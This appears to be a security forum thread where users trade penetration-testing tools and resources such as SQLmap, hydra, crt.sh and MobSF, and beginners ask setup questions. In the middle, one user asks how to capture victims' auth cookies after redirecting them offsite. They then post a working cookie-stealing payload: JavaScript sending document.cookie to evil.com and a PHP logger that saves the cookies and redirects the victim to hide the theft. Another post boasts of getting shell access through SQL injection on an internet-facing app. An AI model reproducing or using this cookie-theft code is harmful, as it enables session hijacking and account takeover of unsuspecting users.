Hello,
These Tools Are Awesome for Penetration Testing against website as it includes All Tools in One Package Try it:-
Thanks,
ABDULWAHAB
1 Like
Many thanks for this tools list. I use some of them every day.
Bit late here, but madusa and hydra are good, they come pre installed with Kali Linux. Cain and Abel for Windows,
If you want to know more how to secure your website I recommend you take a look at this article
1 Like
SQLmap is one of my favorite tools. I’ve been using it with the CO2 Burp Plugin that is similar to SQLiPy Scan. One of my favorite hacks was using this. I got CLI access through a SQLi vulnerability. The target application database server had XP CMD Shell enabled and this was an external Internet facing app.
I ran across a resource to setup a vulnerable AWS environment to practice AWS hacking. https://rhinosecuritylabs.com/aws/cloudgoat-vulnerable-design-aws-environment/
Although they are not ‘tools’ as in software, here are some ‘websites’ I always use, which are very well for getting a basic grasp idea of a website:
- crt.sh - see all subdomains that have TLS certificates
- en.internet.nl - see IPv6 / DNSSEC / HSTS and mail configs
- Mozilla Observatory - Includes lots of 3rd party sites for more dedicated searches like securityheaders.io.
1 Like
Great stuff you shared with us! I haven’t heard about some of above tools before. Thanks for sharing this list of tools.
Wanted to add a tool I wrote: Chomp Scan. This has helped me a lot in doing recon on target domains. It combines a bunch of different tools together in an automated pipeline so you have less to do manually. It can also notify you when scans are done.
1 Like
Mobile :
Mobile Security Framework is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static analysis, dynamic analysis, malware analysis and web API testing.
3 Likes
thnx for posting all this it will be very helpful for me
This tools is use for finding AWS S3 bucket vulrnablity base on hackerone report. Idea of making this tool came from Hackerone report
“https://hackerone.com/reports/128088”
Fantastic resource! I love to see a post like this sticky to the starter section of a forum. Saves so much time for those that are getting into this craft for the first time. Well done!
any other resources that can be used besides github?
Thanks
Hi,
I am looking for a way to capture auth token cookies.
I have a mechanism that invisibly redirects a logged in user to an offsite webpage/website under my control.
Any ideas on how to capture the cookies so that I can re-use them?
I figured it.
You need to point to a page like this
<html>
<body >
<script type="text/javascript">document.location='https://evil.com/stealcookies.php?c='+document.cookie;</script>
</body>
</html>
which redirects to https://evil.com/stealcookies.php :
<html lang="en">
<body >
<?php
header ('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('/var/log/hack/cookies.txt', 'a');
fwrite($file, (date("Y.md h:i:s "))."===================================\n");
fwrite($file, $cookies . "\n\n");
?>
</body>
</html>
This appends new cookies to /var/log/hack/cookies.txt and then redirects to google.com, or choose another page, ideally on the website the victim started on to hide what’s been going on.
Each new cookie set in /var/log/hack/cookies.txt is prepended with a date/time stamp
1 Like
ZAP has got a new home 
a tool to automate the socialmedia lookup of a username.
1 Like
Good day everyone!,
Thank you all for the tools you have recommended,
But I have a question, should I install them on my Ubuntu OS or I should create a Parrot OS or Kali OS?
What do you suggest for a beginner?
Thank you for your response.
Hi,
I currently work as a security consultant in the field of “Pentesting” so this kind of stuff is familiar to me however, is there typically any rules I should be aware of regarding password attacking login interfaces if there is no registration functionality?
On a typical engagements password attacks would normally be permitted as long as they were within lockout constraints, so I wondered if there was a rule of thumb to go by with regards to programs featured on this platform.
TIA
Kind regards,
A fellow Hackerman 